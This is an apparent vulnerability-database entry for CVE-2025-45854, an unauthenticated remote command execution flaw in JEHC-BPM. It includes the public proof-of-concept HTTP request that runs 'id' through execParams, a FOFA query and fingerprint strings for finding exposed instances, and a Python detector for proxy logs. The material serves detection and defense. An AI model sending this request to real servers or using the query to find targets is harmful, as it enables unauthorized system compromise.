CVE-2025-45854
Published 2025-06-03 · CVE-2025-45854: /server/executeExec of JEHC-BPM 2.0.1 allows attackers to execute arbitrary code via execParams.
Priority P2 · 67 · critical · CVSS 3.1 base score 10.0
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Exploit: public exploit available (Nuclei template indexed below)
EPSS: 2.69% (84.0th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jehc | jehc-bpm | <= 2.0.1 | — |
| jehc | jehc-bpm | — | — |
Detection & IOCs (extracted from sources)
Exploit request (as sent by the public PoC; note the form-urlencoded Content-Type carrying a raw JSON body):
POST /server/executeExec HTTP/1.1
Content-Type: application/x-www-form-urlencoded

{"actuator":{"clientIp":"127.0.0.1","port":8082,"applicationName":"testApp","env":"prod","uploadTime":1704523200000,"hasPrefixApplicationName":false,"clientHttpPrefix":"http"},"execParams":{"command":"id"}}
Response match (labelled yara in the source, actually a regex): uid=[0-9]+.*gid=[0-9]+.*
- Detect exploitation attempts by monitoring for unauthenticated POST requests to /server/executeExec whose body is JSON containing an 'execParams' object with a 'command' field.
- Fingerprint JEHC-BPM instances by searching HTTP response bodies for the strings 'JEHC' or 'XSHI' (case-insensitive); this is the pre-check used by the Nuclei template.
- The FOFA query body="JEHC" identifies internet-exposed JEHC-BPM instances that may be vulnerable to this RCE.
- Successful exploitation returns HTTP 200 with a response body matching uid=[0-9]+.*gid=[0-9]+.*, i.e. the output of the Linux 'id' command is reflected to the caller.
- The exploit payload sends Content-Type: application/x-www-form-urlencoded with a JSON body; that combination is unusual for legitimate clients and is worth alerting on for the /server/executeExec endpoint.
- The vulnerability affects JEHC-BPM versions up to and including 2.0.1; /server/executeExec is reachable and exploitable without any credentials.
- The actuator block in the exploit payload carries a hardcoded clientIp of 127.0.0.1 and port 8082. The indexed sources do not document how the application uses these fields; if they feed a loopback-based authorization check, that check is trivially bypassed because the values are attacker-supplied.
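The bullets above describe the detection logic but the page carries no rule for it. The following is an added example (not code from the page, the Nuclei project, or JEHC) that applies those indicators to reverse-proxy log records. The log format, its field names (src, method, path, content_type, body, status, resp_body) and the sample records are constructed for the example; adapt the field mapping to whatever your proxy actually captures.

```python
import json
import re
from urllib.parse import unquote_plus

# Constructed sample JSON-lines log, not real traffic. Record 1 mirrors the
# public PoC request and a successful 'id' response; the rest are controls.
SAMPLE_LOG = r'''
{"src": "203.0.113.7", "method": "POST", "path": "/server/executeExec", "content_type": "application/x-www-form-urlencoded", "body": "{\"actuator\":{\"clientIp\":\"127.0.0.1\",\"port\":8082,\"applicationName\":\"testApp\",\"env\":\"prod\",\"uploadTime\":1704523200000,\"hasPrefixApplicationName\":false,\"clientHttpPrefix\":\"http\"},\"execParams\":{\"command\":\"id\"}}", "status": 200, "resp_body": "uid=1000(app) gid=1000(app) groups=1000(app)\n"}
{"src": "203.0.113.8", "method": "POST", "path": "/server/executeExec", "content_type": "application/json", "body": "{\"execParams\":{\"command\":\"whoami\"}}", "status": 403, "resp_body": "forbidden"}
{"src": "198.51.100.3", "method": "GET", "path": "/server/executeExec", "content_type": "", "body": "", "status": 405, "resp_body": ""}
{"src": "198.51.100.4", "method": "POST", "path": "/login", "content_type": "application/x-www-form-urlencoded", "body": "username=admin&password=x", "status": 200, "resp_body": "<html>JEHC login</html>"}
'''

TARGET_PATH = "/server/executeExec"
# Response regex from the Nuclei template: reflected output of the Linux 'id' command.
ID_OUTPUT = re.compile(r"uid=[0-9]+.*gid=[0-9]+.*")
# Fingerprint strings the Nuclei template pre-check looks for in response bodies.
FINGERPRINT = re.compile(r"JEHC|XSHI", re.IGNORECASE)


def parse_exec_body(raw):
    """Return the body as a dict if it is JSON (raw or URL-encoded), else None.

    The PoC sends raw JSON under a form-urlencoded Content-Type, so some
    proxies log it verbatim and others percent-encode it; try both.
    """
    for candidate in (raw, unquote_plus(raw)):
        try:
            doc = json.loads(candidate)
        except (ValueError, TypeError):
            continue
        if isinstance(doc, dict):
            return doc
    return None


def classify(rec):
    """Tag one log record with the CVE-2025-45854 indicators it matches.

    Returns a list of tags; an empty list means nothing of interest.
    """
    tags = []
    resp_body = rec.get("resp_body", "") or ""
    if rec.get("path") == TARGET_PATH:
        tags.append("executeExec-access")
        if rec.get("method") == "POST":
            doc = parse_exec_body(rec.get("body", "") or "")
            exec_params = doc.get("execParams") if doc else None
            if isinstance(exec_params, dict) and "command" in exec_params:
                tags.append("exploit-attempt")
                tags.append("command=" + str(exec_params["command"]))
                ctype = rec.get("content_type", "") or ""
                if ctype.startswith("application/x-www-form-urlencoded"):
                    # Form Content-Type carrying a JSON body: the PoC's signature.
                    tags.append("form-ct-with-json-body")
            if rec.get("status") == 200 and ID_OUTPUT.search(resp_body):
                tags.append("exploit-success")
    if FINGERPRINT.search(resp_body):
        tags.append("jehc-fingerprint")
    return tags


def scan(log_text):
    """Run classify() over a JSON-lines log and return one alert per tagged record."""
    alerts = []
    for line in log_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        tags = classify(rec)
        if tags:
            alerts.append({"src": rec.get("src"), "tags": tags})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["src"], ", ".join(alert["tags"]))
```

Records that only hit "executeExec-access" or "jehc-fingerprint" are inventory signals, not alerts; "exploit-attempt" on its own warrants a look, and "exploit-success" means command output was returned to the caller and the host should be treated as compromised.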
No detection rules found.
Nuclei
CVE-2025-45854 [CRITICAL] JEHC-BPM - Remote Code Execute (nuclei · CVSS 10.0)
A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
Template (indexed portion; the http request section is not shown on this page):
id: CVE-2025-45854
info:
  name: JEHC-BPM - Remote Code Execute
  author: ritikchaddha
  severity: critical
  description: |
    A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands
No writeups or analysis indexed.
Published: 2025-06-03